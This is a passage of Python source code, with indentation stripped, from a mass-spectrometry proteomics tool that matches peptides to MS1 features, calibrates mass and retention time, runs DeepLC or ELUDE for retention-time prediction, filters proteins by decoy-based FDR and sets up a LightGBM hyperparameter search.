bbins = np.arange(-mass_left, mass_right, bwidth)
H1, b1 = np.histogram(true_md, bins=bbins)
b1 = b1 + bwidth
b1 = b1[:-1]
popt, pcov = curve_fit(noisygaus, b1, H1, p0=[1, np.median(true_md), 1, 1])
mass_shift, mass_sigma = popt[1], abs(popt[2])
return mass_shift, mass_sigma, pcov[0][0]
def calibrate_RT_gaus(bwidth, mass_left, mass_right, true_md):
bbins = np.arange(-mass_left, mass_right, bwidth)
H1, b1 = np.histogram(true_md, bins=bbins)
b1 = b1 + bwidth
b1 = b1[:-1]
popt, pcov = curve_fit(noisygaus, b1, H1, p0=[1, np.median(true_md), bwidth * 5, 1])
mass_shift, mass_sigma = popt[1], abs(popt[2])
return mass_shift, mass_sigma, pcov[0][0]
def process_file(args):
utils.seen_target.clear()
utils.seen_decoy.clear()
args = utils.prepare_decoy_db(args)
return process_peptides(args)
def peptide_processor(peptide, **kwargs):
seqm = peptide
results = []
m = cmass.fast_mass(seqm, aa_mass=kwargs['aa_mass']) + kwargs['aa_mass'].get('Nterm', 0) + kwargs['aa_mass'].get('Cterm', 0)
acc_l = kwargs['acc_l']
acc_r = kwargs['acc_r']
dm_l = acc_l * m / 1.0e6
if acc_r == acc_l:
dm_r = dm_l
else:
dm_r = acc_r * m / 1.0e6
start = nmasses.searchsorted(m - dm_l)
end = nmasses.searchsorted(m + dm_r)
for i in range(start, end):
peak_id = ids[i]
I = Is[i]
massdiff = (m - nmasses[i]) / m * 1e6
mods = 0
results.append((seqm, massdiff, mods, i))
return results
def prepare_peptide_processor(fname, args):
global nmasses
global rts
global charges
global ids
global Is
global Scans
global Isotopes
global mzraw
global avraw
global imraw
min_ch = args['cmin']
max_ch = args['cmax']
min_isotopes = args['i']
min_scans = args['sc']
print('Reading spectra ...')
df_features = utils.iterate_spectra(fname, min_ch, max_ch, min_isotopes, min_scans)
# Sort by neutral mass
df_features = df_features.sort_values(by='massCalib')
nmasses = df_features['massCalib'].values
rts = df_features['rtApex'].values
charges = df_features['charge'].values
ids = df_features['id'].values
Is = df_features['intensityApex'].values
Scans = df_features['nScans'].values
Isotopes = df_features['nIsotopes'].values
mzraw = df_features['mz'].values
avraw = np.zeros(len(df_features))
if len(set(df_features['FAIMS'])) > 1:
imraw = df_features['FAIMS'].values
else:
imraw = df_features['ion_mobility'].values
print('Number of peptide isotopic clusters: %d' % (len(nmasses), ))
fmods = args['fmods']
aa_mass = mass.std_aa_mass
if fmods:
for mod in fmods.split(','):
m, aa = mod.split('@')
if aa == '[':
aa_mass['Nterm'] = float(m)
elif aa == ']':
aa_mass['Cterm'] = float(m)
else:
aa_mass[aa] += float(m)
acc_l = args['ptol']
acc_r = args['ptol']
return {'aa_mass': aa_mass, 'acc_l': acc_l, 'acc_r': acc_r, 'args': args}, df_features
def peptide_processor_iter_isoforms(peptide, **kwargs):
out = []
out.append(peptide_processor(peptide, **kwargs))
return out
def get_results(ms1results):
resdict = dict()
labels = [
'seqs',
'md',
'mods',
'iorig',
# 'rt',
# 'ids',
# 'Is',
# 'Scans',
# 'Isotopes',
# 'mzraw',
# 'av',
# 'ch',
# 'im',
]
for label, val in zip(labels, zip(*ms1results)):
resdict[label] = np.array(val)
return resdict
def filter_results(resultdict, idx):
tmp = dict()
for label in resultdict:
tmp[label] = resultdict[label][idx]
return tmp
def process_peptides(args):
fname = args['file']
fdr = args['fdr'] / 100
min_isotopes_calibration = args['ci']
try:
outpath = args['outpath']
except:
outpath = False
if outpath:
base_out_name = os.path.splitext(os.path.join(outpath, os.path.basename(fname)))[0]
else:
base_out_name = os.path.splitext(fname)[0]
out_log = open(base_out_name + '_log.txt', 'w')
out_log.close()
out_log = open(base_out_name + '_log.txt', 'w')
elude_path = args['elude']
elude_path = elude_path.strip()
deeplc_path = args['deeplc']
deeplc_path = deeplc_path.strip()
calib_path = args['pl']
calib_path = calib_path.strip()
if calib_path and args['ts']:
args['ts'] = 0
print('Two-stage RT prediction does not work with list of MS/MS identified peptides...')
args['enzyme'] = utils.get_enzyme(args['e'])
ms1results = []
peps = utils.peptide_gen(args)
kwargs, df_features = prepare_peptide_processor(fname, args)
func = peptide_processor_iter_isoforms
print('Running the search ...')
for y in utils.multimap(1, func, peps, **kwargs):
for result in y:
if len(result):
ms1results.extend(result)
prefix = args['prefix']
protsN, pept_prot = utils.get_prot_pept_map(args)
resdict = get_results(ms1results)
del ms1results
resdict['mc'] = np.array([parser.num_sites(z, args['enzyme']) for z in resdict['seqs']])
isdecoy = lambda x: x[0].startswith(prefix)
isdecoy_key = lambda x: x.startswith(prefix)
escore = lambda x: -x[1]
e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
# e_ind = resdict['Isotopes'] >= min_isotopes_calibration
# e_ind = resdict['Isotopes'] >= 1
resdict2 = filter_results(resdict, e_ind)
e_ind = resdict2['mc'] == 0
resdict2 = filter_results(resdict2, e_ind)
p1 = set(resdict2['seqs'])
if len(p1):
prots_spc2 = defaultdict(set)
for pep, proteins in pept_prot.items():
if pep in p1:
for protein in proteins:
prots_spc2[protein].add(pep)
for k in protsN:
if k not in prots_spc2:
prots_spc2[k] = set([])
prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
names_arr = np.array(list(prots_spc.keys()))
v_arr = np.array(list(prots_spc.values()))
n_arr = np.array([protsN[k] for k in prots_spc])
top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
prots_spc = dict()
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc[k] = all_pvals[idx]
checked = set()
for k, v in list(prots_spc.items()):
if k not in checked:
if isdecoy_key(k):
if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
del prots_spc[k]
checked.add(k.replace(prefix, ''))
else:
if prots_spc.get(prefix + k, -1e6) > v:
del prots_spc[k]
checked.add(prefix + k)
filtered_prots = aux.filter(prots_spc.items(), fdr=0.05, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1,
full_output=True)
identified_proteins = 0
for x in filtered_prots:
identified_proteins += 1
print('results for default search: number of identified proteins = %d' % (identified_proteins, ))
print('Running mass recalibration...')
e_ind = resdict['mc'] == 0
resdict2 = filter_results(resdict, e_ind)
true_md = []
true_isotopes = []
true_seqs = []
true_prots = set(x[0] for x in filtered_prots)
for pep, proteins in pept_prot.items():
if any(protein in true_prots for protein in proteins):
true_seqs.append(pep)
e_ind = np.in1d(resdict2['seqs'], true_seqs)
true_seqs = resdict2['seqs'][e_ind]
true_md.extend(resdict2['md'][e_ind])
true_md = np.array(true_md)
# true_isotopes.extend(resdict2['Isotopes'][e_ind])
true_isotopes.extend(np.array([Isotopes[iorig] for iorig in resdict2['iorig']])[e_ind])
true_isotopes = np.array(true_isotopes)
true_intensities = np.array([Is[iorig] for iorig in resdict2['iorig']])[e_ind]
# true_intensities = np.array(resdict2['Is'][e_ind])
# true_rt = np.array(resdict2['rt'][e_ind])
# true_mz = np.array(resdict2['mzraw'][e_ind])
true_rt = np.array([rts[iorig] for iorig in resdict2['iorig']])[e_ind]
true_mz = np.array([mzraw[iorig] for iorig in resdict2['iorig']])[e_ind]
df1 = pd.DataFrame()
df1['mass diff'] = true_md
df1['mz'] = true_mz
df1['RT'] = true_rt
df1['Intensity'] = true_intensities
df1['seqs'] = true_seqs
df1['orig_md'] = true_md
mass_left = args['ptol']
mass_right = args['ptol']
try:
mass_shift, mass_sigma, covvalue = calibrate_mass(0.001, mass_left, mass_right, true_md)
except:
mass_shift, mass_sigma, covvalue = calibrate_mass(0.01, mass_left, mass_right, true_md)
print('Calibrated mass shift: ', mass_shift)
print('Calibrated mass sigma in ppm: ', mass_sigma)
out_log.write('Calibrated mass shift: %s\n' % (mass_shift, ))
out_log.write('Calibrated mass sigma in ppm: %s\n' % (mass_sigma, ))
e_all = abs(resdict['md'] - mass_shift) / (mass_sigma)
r = 3.0
e_ind = e_all <= r
resdict = filter_results(resdict, e_ind)
zs_all = e_all[e_ind] ** 2
e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
resdict2 = filter_results(resdict, e_ind)
e_ind = resdict2['mc'] == 0
resdict2 = filter_results(resdict2, e_ind)
p1 = set(resdict2['seqs'])
prots_spc2 = defaultdict(set)
for pep, proteins in pept_prot.items():
if pep in p1:
for protein in proteins:
prots_spc2[protein].add(pep)
for k in protsN:
if k not in prots_spc2:
prots_spc2[k] = set([])
prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
names_arr = np.array(list(prots_spc.keys()))
v_arr = np.array(list(prots_spc.values()))
n_arr = np.array([protsN[k] for k in prots_spc])
top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
prots_spc = dict()
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc[k] = all_pvals[idx]
checked = set()
for k, v in list(prots_spc.items()):
if k not in checked:
if isdecoy_key(k):
if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
del prots_spc[k]
checked.add(k.replace(prefix, ''))
else:
if prots_spc.get(prefix + k, -1e6) > v:
del prots_spc[k]
checked.add(prefix + k)
filtered_prots = aux.filter(prots_spc.items(), fdr=0.05, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1,
full_output=True)
identified_proteins = 0
for x in filtered_prots:
identified_proteins += 1
print('results for default search after mass calibration: number of identified proteins = %d' % (identified_proteins, ))
print('Running RT prediction...')
e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
# e_ind = resdict['Isotopes'] >= min_isotopes_calibration
# e_ind = resdict['Isotopes'] >= 1
resdict2 = filter_results(resdict, e_ind)
e_ind = resdict2['mc'] == 0
resdict2 = filter_results(resdict2, e_ind)
true_seqs = []
true_rt = []
true_isotopes = []
true_prots = set(x[0] for x in filtered_prots)#[:5])
for pep, proteins in pept_prot.items():
if any(protein in true_prots for protein in proteins):
true_seqs.append(pep)
e_ind = np.in1d(resdict2['seqs'], true_seqs)
true_seqs = resdict2['seqs'][e_ind]
true_rt.extend(np.array([rts[iorig] for iorig in resdict2['iorig']])[e_ind])
# true_rt.extend(resdict2['rt'][e_ind])
true_rt = np.array(true_rt)
true_isotopes.extend(np.array([Isotopes[iorig] for iorig in resdict2['iorig']])[e_ind])
# true_isotopes.extend(resdict2['Isotopes'][e_ind])
true_isotopes = np.array(true_isotopes)
e_all = abs(resdict2['md'][e_ind] - mass_shift) / (mass_sigma)
zs_all_tmp = e_all ** 2
e_ind = true_isotopes >= min_isotopes_calibration
true_seqs = true_seqs[e_ind]
true_rt = true_rt[e_ind]
true_isotopes = true_isotopes[e_ind]
zs_all_tmp = zs_all_tmp[e_ind]
e_ind = np.argsort(zs_all_tmp)
true_seqs = true_seqs[e_ind]
true_rt = true_rt[e_ind]
true_isotopes = true_isotopes[e_ind]
true_seqs = true_seqs[:2500]
true_rt = true_rt[:2500]
true_isotopes = true_isotopes[:2500]
best_seq = defaultdict(list)
newseqs = []
newRTs = []
for seq, RT in zip(true_seqs, true_rt):
best_seq[seq].append(RT)
for k, v in best_seq.items():
newseqs.append(k)
newRTs.append(np.median(v))
true_seqs = np.array(newseqs)
true_rt = np.array(newRTs)
if calib_path:
df1 = pd.read_csv(calib_path, sep='\t')
true_seqs2 = df1['peptide'].values
true_rt2 = df1['RT exp'].values
else:
true_seqs2 = true_seqs
true_rt2 = true_rt
if args['ts'] != 2 and deeplc_path:
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outcalib_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outcalib = open(outcalib_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
ns = true_seqs
nr = true_rt
print('Peptides used for RT prediction: %d' % (len(ns), ))
ns2 = true_seqs2
nr2 = true_rt2
outtrain.write('seq,modifications,tr\n')
for seq, RT in zip(ns2, nr2):
mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
outtrain.close()
outcalib.write('seq,modifications,tr\n')
for seq, RT in zip(ns, nr):
mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
outcalib.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
outcalib.close()
subprocess.call([deeplc_path, '--file_pred', outcalib_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
pepdict = dict()
train_RT = []
train_seq = []
for x in open(outres_name).readlines()[1:]:
_, seq, _, RTexp, RT = x.strip().split(',')
pepdict[seq] = float(RT)
train_seq.append(seq)
train_RT.append(float(RTexp))
train_RT = np.array(train_RT)
RT_pred = np.array([pepdict[s] for s in train_seq])
rt_diff_tmp = RT_pred - train_RT
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
try:
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 100
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
except:
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
else:
if args['ts'] != 2 and elude_path:
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outcalib_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outcalib = open(outcalib_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
ns = true_seqs
nr = true_rt
print('Peptides used for RT prediction: %d' % (len(ns), ))
ns2 = true_seqs2
nr2 = true_rt2
for seq, RT in zip(ns, nr):
outtrain.write(seq + '\t' + str(RT) + '\n')
outtrain.close()
for seq, RT in zip(ns, nr):
outcalib.write(seq + '\t' + str(RT) + '\n')
outcalib.close()
subprocess.call([elude_path, '-t', outtrain_name, '-e', outcalib_name, '-a', '-g', '-o', outres_name])
pepdict = dict()
train_RT = []
train_seq = []
for x in open(outres_name).readlines()[3:]:
seq, RT, RTexp = x.strip().split('\t')
pepdict[seq] = float(RT)
train_seq.append(seq)
train_RT.append(float(RTexp))
train_RT = np.array(train_RT)
rt_diff_tmp = RT_pred - train_RT
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
else:
ns = true_seqs
nr = true_rt
ns2 = true_seqs2
nr2 = true_rt2
RC = achrom.get_RCs_vary_lcp(ns2, nr2)
RT_pred = np.array([achrom.calculate_RT(s, RC) for s in ns])
train_RT = nr
aa, bb, RR, ss = aux.linear_regression(RT_pred, nr)
rt_diff_tmp = RT_pred - nr
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
print(aa, bb, RR, ss)
best_sigma = XRT_sigma
RT_sigma = XRT_sigma
else:
print('No matches found')
if args['ts']:
print('Running second stage RT prediction...')
ns = np.array(ns)
nr = np.array(nr)
idx = np.abs((rt_diff_tmp) - XRT_shift) <= 3 * XRT_sigma
ns = ns[idx]
nr = nr[idx]
if deeplc_path:
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
print('Peptides used for RT prediction: %d' % (len(ns), ))
ll = len(ns)
ns = ns[:ll]
nr = nr[:ll]
outtrain.write('seq,modifications,tr\n')
for seq, RT in zip(ns, nr):
mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
outtrain.close()
subprocess.call([deeplc_path, '--file_pred', outtrain_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
pepdict = dict()
train_RT = []
train_seq = []
for x in open(outres_name).readlines()[1:]:
_, seq, _, RTexp, RT = x.strip().split(',')
pepdict[seq] = float(RT)
train_seq.append(seq)
train_RT.append(float(RTexp))
train_RT = np.array(train_RT)
RT_pred = np.array([pepdict[s] for s in train_seq])
rt_diff_tmp = RT_pred - train_RT
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
try:
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 100
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
except:
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
else:
if elude_path:
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
print(len(ns))
ll = len(ns)
ns = ns[:ll]
nr = nr[:ll]
for seq, RT in zip(ns, nr):
outtrain.write(seq + '\t' + str(RT) + '\n')
outtrain.close()
subprocess.call([elude_path, '-t', outtrain_name, '-e', outtrain_name, '-a', '-g', '-o', outres_name])
pepdict = dict()
train_RT = []
train_seq = []
for x in open(outres_name).readlines()[3:]:
seq, RT, RTexp = x.strip().split('\t')
pepdict[seq] = float(RT)
train_seq.append(seq)
train_RT.append(float(RTexp))
train_RT = np.array(train_RT)
RT_pred = np.array([pepdict[s] for s in train_seq])
rt_diff_tmp = RT_pred - train_RT
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
else:
RC = achrom.get_RCs_vary_lcp(ns, nr)
RT_pred = np.array([achrom.calculate_RT(s, RC) for s in ns])
aa, bb, RR, ss = aux.linear_regression(RT_pred, nr)
rt_diff_tmp = RT_pred - nr
RT_left = -min(rt_diff_tmp)
RT_right = max(rt_diff_tmp)
start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
if np.isinf(covvalue):
XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
print('Calibrated RT shift: ', XRT_shift)
print('Calibrated RT sigma: ', XRT_sigma)
print(aa, bb, RR, ss)
best_sigma = XRT_sigma
RT_sigma = XRT_sigma
out_log.write('Calibrated RT shift: %s\n' % (XRT_shift, ))
out_log.write('Calibrated RT sigma: %s\n' % (XRT_sigma, ))
out_log.close()
p1 = set(resdict['seqs'])
n = args['nproc']
if deeplc_path:
pepdict = dict()
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain.write('seq,modifications,tr\n')
for seq, RT in zip(ns, nr):
mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
outtrain.close()
outtest_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtest = open(outtest_name, 'w')
outtest.write('seq,modifications\n')
for seq in p1:
mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
outtest.write(seq + ',' + str(mods_tmp) + '\n')
outtest.close()
if args['deeplc_library']:
print('Using deeplc library...')
subprocess.call([deeplc_path, '--file_pred', outtest_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name, '--use_library', args['deeplc_library'], '--write_library'])
else:
subprocess.call([deeplc_path, '--file_pred', outtest_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
for x in open(outres_name).readlines()[1:]:
_, seq, _, RT = x.strip().split(',')
pepdict[seq] = float(RT)
else:
if n == 1 or os.name == 'nt':
qin = list(p1)
qout = []
if elude_path:
pepdict = worker_RT(qin, qout, 0, 1, False, elude_path, ns, nr, True)
else:
pepdict = worker_RT(qin, qout, 0, 1, RC, False, False, False, True)
else:
qin = list(p1)
qout = Queue()
procs = []
for i in range(n):
if elude_path:
p = Process(target=worker_RT, args=(qin, qout, i, n, False, elude_path, ns, nr))
else:
p = Process(target=worker_RT, args=(qin, qout, i, n, RC, False, False, False))
p.start()
procs.append(p)
pepdict = dict()
for _ in range(n):
for item in iter(qout.get, None):
for k, v in item.items():
pepdict[k] = v
for p in procs:
p.join()
rt_pred = np.array([pepdict[s] for s in resdict['seqs']])
rt_diff = np.array([rts[iorig] for iorig in resdict['iorig']]) - rt_pred
# rt_diff = resdict['rt'] - rt_pred
e_all = (rt_diff) ** 2 / (RT_sigma ** 2)
r = 9.0
e_ind = e_all <= r
resdict = filter_results(resdict, e_ind)
rt_diff = rt_diff[e_ind]
rt_pred = rt_pred[e_ind]
with open(base_out_name + '_protsN.tsv', 'w') as output:
output.write('dbname\ttheor peptides\n')
for k, v in protsN.items():
output.write('\t'.join((k, str(v))) + '\n')
with open(base_out_name + '_PFMs.tsv', 'w') as output:
output.write('sequence\tmass diff\tRT diff\tpeak_id\tIntensity\tnScans\tnIsotopes\tproteins\tm/z\tRT\taveragineCorr\tcharge\tion_mobility\n')
# for seq, md, rtd, peak_id, I, nScans, nIsotopes, mzr, rtr, av, ch, im in zip(resdict['seqs'], resdict['md'], rt_diff, resdict['ids'], resdict['Is'], resdict['Scans'], resdict['Isotopes'], resdict['mzraw'], resdict['rt'], resdict['av'], resdict['ch'], resdict['im']):
for seq, md, rtd, iorig in zip(resdict['seqs'], resdict['md'], rt_diff, resdict['iorig']):
peak_id = ids[iorig]
I = Is[iorig]
nScans = Scans[iorig]
nIsotopes = Isotopes[iorig]
mzr = mzraw[iorig]
rtr = rts[iorig]
av = avraw[iorig]
ch = charges[iorig]
im = imraw[iorig]
output.write('\t'.join((seq, str(md), str(rtd), str(peak_id), str(I), str(nScans), str(nIsotopes), ';'.join(pept_prot[seq]), str(mzr), str(rtr), str(av), str(ch), str(im))) + '\n')
e_ind = resdict['mc'] == 0
resdict = filter_results(resdict, e_ind)
rt_diff = rt_diff[e_ind]
rt_pred = rt_pred[e_ind]
mass_diff = (resdict['md'] - mass_shift) / (mass_sigma)
rt_diff = (np.array([rts[iorig] for iorig in resdict['iorig']]) - rt_pred) / RT_sigma
# rt_diff = (resdict['rt'] - rt_pred) / RT_sigma
prefix = 'DECOY_'
isdecoy = lambda x: x[0].startswith(prefix)
isdecoy_key = lambda x: x.startswith(prefix)
escore = lambda x: -x[1]
SEED = 42
# Hyperparameter grid
param_grid = {
'boosting_type': ['gbdt', ],
'num_leaves': list(range(10, 1000)),
'learning_rate': list(np.logspace(np.log10(0.001), np.log10(0.05), base = 10, num = 1000)),
'metric': ['rmse', ],
'verbose': [-1, ],
'num_threads': [args['nproc'], ],
}
def get_X_array(df, feature_columns):
return df.loc[:, feature_columns].values
def get_Y_array_pfms(df):
return df.loc[:, 'decoy'].values
def get_features_pfms(dataframe):
feature_columns = dataframe.columns
columns_to_remove = []
banned_features = {
'iorig',
'ids',
'seqs',
'decoy',
'preds',
'av',
'Scans',
'proteins',
'peptide',
'md',
}
for feature in feature_columns:
if feature in banned_features:
columns_to_remove.append(feature)
feature_columns = feature_columns.drop(columns_to_remove)
return feature_columns
def objective_pfms(df, hyperparameters, iteration, threshold=0):
"""Objective function for grid and random search. Returns
the cross validation score from a set of hyperparameters."""
all_res = []
groups = df['peptide']
ix = df.index.values
unique = np.unique(groups)
np.random.RandomState(SEED).shuffle(unique)
result = []
for split in np.array_split(unique, 3):
mask = groups.isin(split)
train, test = ix[~mask], ix[mask]
train_df = df.iloc[train]
test_df = df.iloc[test]
feature_columns = get_features_pfms(df)
model = get_cat_model_final_pfms(train_df, hyperparameters, feature_columns)
df.loc[mask, 'preds'] = model.predict(get_X_array(df.loc[mask, :], feature_columns))
train_df = df.iloc[train]
test_df = df.iloc[test]
fpr, tpr, thresholds = metrics.roc_curve(get_Y_array_pfms(test_df), test_df['preds'])
shr_v = metrics.auc(fpr, tpr)
# shr_v = len(aux.filter(test_df, fdr=0.25, key='preds', is_decoy='decoy'))
all_res.append(shr_v)
# print(shr_v)
if shr_v < threshold:
all_res = [0, ]
break
shr_v = np.mean(all_res)
# print(shr_v)
# print('\n')
return [shr_v, hyperparameters, iteration, all_res]
def random_search_pfms(df, param_grid, out_file, max_evals):
"""Random search for hyperparameter optimization.
Writes result of search to csv file every search iteration."""
threshold = 0
# Dataframe for results
results = pd.DataFrame(columns = ['sharpe', 'params', 'iteration', 'all_res'],
index = list(range(max_evals)))
for i in range(max_evals):
print('%d/%d' % (i+1, max_evals))
# Choose random hyperparameters
random_params = {k: random.sample(v, 1)[0] for k, v in param_grid.items()}
# Evaluate randomly selected hyperparameters
eval_results = objective_pfms(df, random_params, i, threshold)
results.loc[i, :] = eval_results
threshold = max(threshold, np.mean(eval_results[3]) - 3 * np.std(eval_results[3]))
# open connection (append option) and write results
of_connection = open(out_file, 'a')
writer = csv.writer(of_connection)
writer.writerow(eval_results)
# make sure to close connection
of_connection.close()
# Sort with best score on top
results.sort_values('sharpe', ascending = False, inplace = True)
results.reset_index(inplace = True)
return results
def get_cat_model_pfms(df, hyperparameters, feature_columns, train, test):
feature_columns = list(feature_columns)
dtrain = lgb.Dataset(get_X_array(train, feature_columns), get_Y_array_pfms(train), feature_name=feature_columns, free_raw_data=False)
dvalid = lgb.Dataset(get_X_array(test, feature_columns), get_Y_array_pfms(test), feature_name=feature_columns, free_raw_data=False)
np.random.seed(SEED)
evals_result = {}
model = lgb.train(hyperparameters, dtrain, num_boost_round=5000, valid_sets=(dvalid,), valid_names=('valid',), verbose_eval=False,
early_stopping_rounds=20, evals_result=evals_result)
return model
def get_cat_model_final_pfms(df, hyperparameters, feature_columns):
feature_columns = list(feature_columns)
train = df
dtrain = lgb.Dataset(get_X_array(train, feature_columns), get_Y_array_pfms(train), feature_name=feature_columns, free_raw_data=False)
np.random.seed(SEED)
model = lgb.train(hyperparameters, dtrain, num_boost_round=100)
return model
df1 = pd.DataFrame()
for k in resdict.keys():
df1[k] = resdict[k]
